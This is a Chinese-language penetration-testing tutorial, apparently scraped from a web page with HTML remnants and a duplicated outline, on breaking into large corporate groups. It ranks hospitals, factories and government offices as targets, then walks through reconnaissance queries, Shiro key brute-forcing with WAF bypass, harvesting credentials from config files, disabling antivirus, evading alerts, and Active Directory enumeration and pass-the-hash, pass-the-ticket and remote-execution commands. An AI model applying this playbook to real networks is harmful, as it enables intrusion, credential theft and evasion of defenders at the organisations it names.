大型集团渗透测试实战教学文档<\/h1>

1. 目标资产优先级评估<\/h2>
在渗透测试前，首先对目标资产进行优先级分类：<\/p>

1.1 攻击优先级梯度<\/h3>

第一梯度（高优先级）<\/strong>：<\/p>

私企、医疗、科技园区、工厂<\/li>
特点：业务体量大、互联网暴露面多<\/li> <\/ul>
第二梯度（中等优先级）<\/strong>：<\/p>

政府单位（人社厅\/局、教育厅\/局）<\/li>
学校、国企<\/li>
特点：防护等级较高但安全意识薄弱，监控力度白天>晚上<\/li> <\/ul>
第三梯度（低优先级）<\/strong>：<\/p>

电力、金融单位<\/li>
特点：安全性高、暴露面少，安全规范严格<\/li> <\/ul>
2. 信息收集阶段<\/h2>
2.1 资产测绘三维度<\/h3>

企业关联查询<\/strong>：<\/p>

使用爱企查查询控股子公司<\/li>
通过招标文件及官网信息查询第三方供应商<\/li>
通过ICP备案查询企业注册的域名、小程序、APP资产<\/li> <\/ul> <\/li>

自动化收集工具<\/strong>：<\/p>

子域名扫描<\/li>
DNS查询<\/li>
端口扫描<\/li>
指纹识别<\/li>
漏洞测试<\/li> <\/ul> <\/li>

业务导向收集<\/strong>：<\/p>

根据目标主营业务（如制造业）收集相关系统<\/li>
查找同类型业务系统<\/li> <\/ul> <\/li> <\/ol>
2.2 网络空间测绘平台使用<\/h3>
推荐平台及特点<\/strong>：<\/p>

Hunter<\/strong>：收录快、内容新，备案内容全面<\/li>
Fofa<\/strong>：数据量大但效果有所下降<\/li>
360quake<\/strong>：对已备案资产收集顶尖<\/li>
Zero零零信安<\/strong>：移动资产、小程序搜索表现突出<\/li>
微步情报社区<\/strong>：端口、whois信息、子域名方面顶级<\/li> <\/ul>
搜索语法示例<\/strong>：<\/p>
# title关键字<\/span> <\/span><\/span>domain=<\/span>"xxx.com"<\/span> &&<\/span> (<\/span>web.title=<\/span>"管理"<\/span> ||<\/span> web.title=<\/span>"后台"<\/span> ||<\/span> web.title=<\/span>"登录"<\/span> ||<\/span> web.title=<\/span>"邮件"<\/span> ||<\/span> web.title=<\/span>"教务"<\/span> ||<\/span> web.title=<\/span>"注册"<\/span> ||<\/span> web.title=<\/span>"访客"<\/span>)<\/span> <\/span><\/span> <\/span><\/span># body关键字<\/span> <\/span><\/span>domain=<\/span>"xxx.com"<\/span> &&<\/span> (<\/span>web.body=<\/span>"管理"<\/span> ||<\/span> web.body=<\/span>"后台"<\/span> ||<\/span> web.body=<\/span>"登录"<\/span> ||<\/span> web.body=<\/span>"用户名"<\/span> ||<\/span> web.body=<\/span>"密码"<\/span> ||<\/span> web.body=<\/span>"验证码"<\/span> ||<\/span> web.body=<\/span>"系统"<\/span> ||<\/span> web.body=<\/span>"账号"<\/span> ||<\/span> web.body=<\/span>"忘记密码"<\/span>)<\/span> <\/span><\/span><\/code><\/pre>3. 漏洞利用阶段<\/h2> 3.1 Shiro反序列化攻击<\/h3> 攻击流程<\/strong>：<\/p> 发现Shiro框架后尝试爆破密钥<\/li> 推荐工具：ShiroAttack2（需二开添加WAF绕过功能） GitHub地址：https:\/\/github.com\/SummerSec\/ShiroAttack2<\/li> <\/ul> <\/li> 注意大型集团通常有WAF防护，需要专门绕过<\/li> <\/ol> 3.2 服务器权限获取后操作<\/h3> 敏感配置文件收集<\/strong>：<\/p> dir<\/span> \/s\/b *.conf <\/span><\/span><\/code><\/pre><\/li> 自动化敏感信息收集（Go程序示例）<\/strong>：<\/p> 关键搜索词： jdbc, redis, mysql, pgsql, oracle, oss.accessKey, oss.secretKey, password, username, mail, token, datasource, accessKeyId, accessKeySecret <\/code><\/pre> <\/li> 完整关键词列表见附录A<\/li> <\/ul> <\/li> 密码本构建技巧<\/strong>：<\/p> 大型企业内网密码常包含公司名+年份<\/li> 示例：wanhai2025@!+ 或 whqwe@++!<\/li> <\/ul> <\/li> <\/ol> 4. 内网突破<\/h2> 4.1 主机信息收集<\/h3> 避免直接上线C2<\/strong>：<\/p> 先进行本地信息收集<\/li> 重点查找配置文件获取数据泄露分<\/li> <\/ul> <\/li> 杀软对抗（ESET Security企业版）<\/strong>：<\/p> 推荐工具：Vshell（内网隧道管理）<\/li> 免杀技巧：网上搜索现成方案<\/li> 自行开发免杀载荷<\/li> 极端方法：使用火绒强碎粉碎杀软安装目录<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 4.2 内网渗透策略<\/h3> 初始操作<\/strong>：<\/p> 搭建隧道<\/li> 使用免杀版fscan扫描<\/li> 优先爆破RDP和数据库<\/li> <\/ul> <\/li> 注意事项<\/strong>：<\/p> 扫描速率调低避免触发告警<\/li> 优先获取主机权限而非Web权限<\/li> 获取跳板机降低入口点暴露风险<\/li> <\/ul> <\/li> <\/ol> 5. 横向移动技术<\/h2> 5.1 域内信息收集<\/h3> 基础命令<\/strong>：<\/p> ipconfig \/all # 查看IP配置、DNS服务器 <\/span><\/span>systeminfo # 获取系统信息 <\/span><\/span>net time \/domain # 探测域控主机名 <\/span><\/span>net config workstation # 显示计算机名、用户名 <\/span><\/span>whoami \/all # 查看当前用户权限 <\/span><\/span><\/code><\/pre>用户与组枚举<\/strong>：<\/p> net user \/domain # 列出域内所有用户 <\/span><\/span>net user <username> \/domain # 查询指定用户详情 <\/span><\/span>net group \/domain # 列出域内所有组 <\/span><\/span>net group "Domain Admins"<\/span> \/domain # 枚举域管理员 <\/span><\/span><\/code><\/pre>计算机对象枚举<\/strong>：<\/p> net group "Domain Computers"<\/span> \/domain <\/span><\/span># PowerShell: <\/span><\/span>Get-ADComputer -Filter * -Properties * | Select-Object Name, OperatingSystem <\/span><\/span><\/code><\/pre>5.2 高级信息收集<\/h3> 域信任关系<\/strong>：<\/p> nltest \/domain_trusts \/all_trusts \/v <\/span><\/span># PowerShell: <\/span><\/span>Get-ADTrust -Filter * -Properties * | Select-Object Name, Direction, Source, Target <\/span><\/span><\/code><\/pre>组策略信息<\/strong>：<\/p> gpresult \/H report.html \/Scope Computer \/Scope User <\/span><\/span># PowerShell: <\/span><\/span>Get-GPO -All <\/span><\/span><\/code><\/pre>SPN扫描与服务发现<\/strong>：<\/p> setspn -T <domain> -Q *\/* <\/span><\/span># PowerShell: <\/span><\/span>Get-ADObject -LDAPFilter "(servicePrincipalName=*)"<\/span> -Properties servicePrincipalName <\/span><\/span><\/code><\/pre>5.3 横向移动技术<\/h3> Pass The Hash (PtH)<\/strong>：<\/p> crackmapexec smb <targets> -u <user> -H <hash> <\/span><\/span>psexec.py -hashes :<hash> <user>@<target> <\/span><\/span><\/code><\/pre><\/li> Pass The Ticket (PtT)<\/strong>：<\/p> Rubeus: ptt \/ticket:<ticket.kirbi><\/code><\/li> Mimikatz: kerberos::ptt<\/code><\/li> <\/ul> <\/li> Overpass The Hash\/Pass The Key<\/strong>：<\/p> Rubeus asktgt \/user:<user> \/domain:<domain> \/aes256:<aes_key> \/nowrap <\/span><\/span>Mimikatz: kerberos::ekeys + kerberos::asktgt <\/span><\/span><\/code><\/pre><\/li> WMI远程执行<\/strong>：<\/p> wmic \/node:<target> \/user:<user> \/password:<pass> process call create "cmd.exe \/c ..."<\/span> <\/span><\/span># PowerShell: <\/span><\/span>Invoke-WmiMethod ... <\/span><\/span><\/code><\/pre><\/li> WinRM远程执行<\/strong>：<\/p> Enter-PSSession -ComputerName <target> -Credential <cred> <\/span><\/span>Invoke-Command -ComputerName <target> -ScriptBlock { ... } -Credential <cred> <\/span><\/span><\/code><\/pre><\/li> SMB共享与远程命令执行<\/strong>：<\/p> 使用psexec, smbexec等工具<\/li> 直接访问远程SMB共享(\\C$)<\/li> <\/ul> <\/li> 远程桌面协议(RDP)<\/strong>：<\/p> 使用获取的凭证直接RDP登录<\/li> <\/ul> <\/li> 服务控制管理器(SCM)<\/strong>：<\/p> sc.exe \\<target> create ... binPath= "cmd.exe \/c ..."<\/span> start= auto <\/span><\/span>sc.exe \\<target> start <service> <\/span><\/span><\/code><\/pre><\/li> DCOM远程执行<\/strong>：<\/p> 利用MMC20.Application, ShellWindows等COM对象<\/li> <\/ul> <\/li> <\/ol> 附录A：完整敏感信息关键词列表<\/h2> jdbc, redis, mysql, pgsql, postgresql, oracle, oss, oss.accessKey, oss.secretKey, secretKey, accessKey, ak, sk, mongondb, password, username, mail, token, datasource, accessKeyId, accessKeySecret, mssql, sqlserver, aliyun, oss, kingbase8, kingbase, SQLite, Neo4j, access_key, access_token, admin_pass, admin_user, algolia_admin_key, algolia_api_key, alias_pass, alicloud_access_key, amazon_secret_access_key, amazonaws, ansible_vault_password, aos_key, api_key, api_key_secret, api_key_sid, api_secret, api.googlemaps AIza, apidocs, apikey, apiSecret, app_debug, app_id, app_key, app_log_level, app_secret, appkey, appkeysecret, application_key, appsecret, appspot, auth_token, authorizationToken, authsecret, aws_access, aws_access_key_id, aws_bucket, aws_key, aws_secret, aws_secret_key, aws_token, AWSSecretKey, b2_app_key, bashrc password, bintray_apikey, bintray_gpg_password, bintray_key, bintraykey, bluemix_api_key, bluemix_pass, browserstack_access_key, bucket_password, bucketeer_aws_access_key_id, bucketeer_aws_secret_access_key, built_branch_deploy_key, bx_password, cache_driver, cache_s3_secret_key, cattle_access_key, cattle_secret_key, certificate_password, ci_deploy_password, client_secret, client_zpk_secret_key, clojars_password, cloud_api_key, cloud_watch_aws_access_key, cloudant_password, cloudflare_api_key, cloudflare_auth_key, cloudinary_api_secret, cloudinary_name, codecov_token, config, conn.login, connectionstring, consumer_key, consumer_secret, credentials, cypress_record_key, database_password, database_schema_test, datadog_api_key, datadog_app_key, db_password, db_server, db_username, dbpasswd, dbpassword, dbuser, deploy_password, digitalocean_ssh_key_body, digitalocean_ssh_key_ids, docker_hub_password, docker_key, docker_pass, docker_passwd, docker_password, dockerhub_password, dockerhubpassword, dot-files, dotfiles, droplet_travis_password, dynamoaccesskeyid, dynamosecretaccesskey, elastica_host, elastica_port, elasticsearch_password, encryption_key, encryption_password, env.heroku_api_key, env.sonatype_password, eureka.awssecretkey <\/code><\/pre>

大型集团渗透测试实战教学文档<\/h1>

1. 目标资产优先级评估<\/h2> 在渗透测试前，首先对目标资产进行优先级分类：<\/p>

2. 信息收集阶段<\/h2>

3. 漏洞利用阶段<\/h2>

4. 内网突破<\/h2>

5. 横向移动技术<\/h2>

1. 目标资产优先级评估<\/h2>
在渗透测试前，首先对目标资产进行优先级分类：<\/p>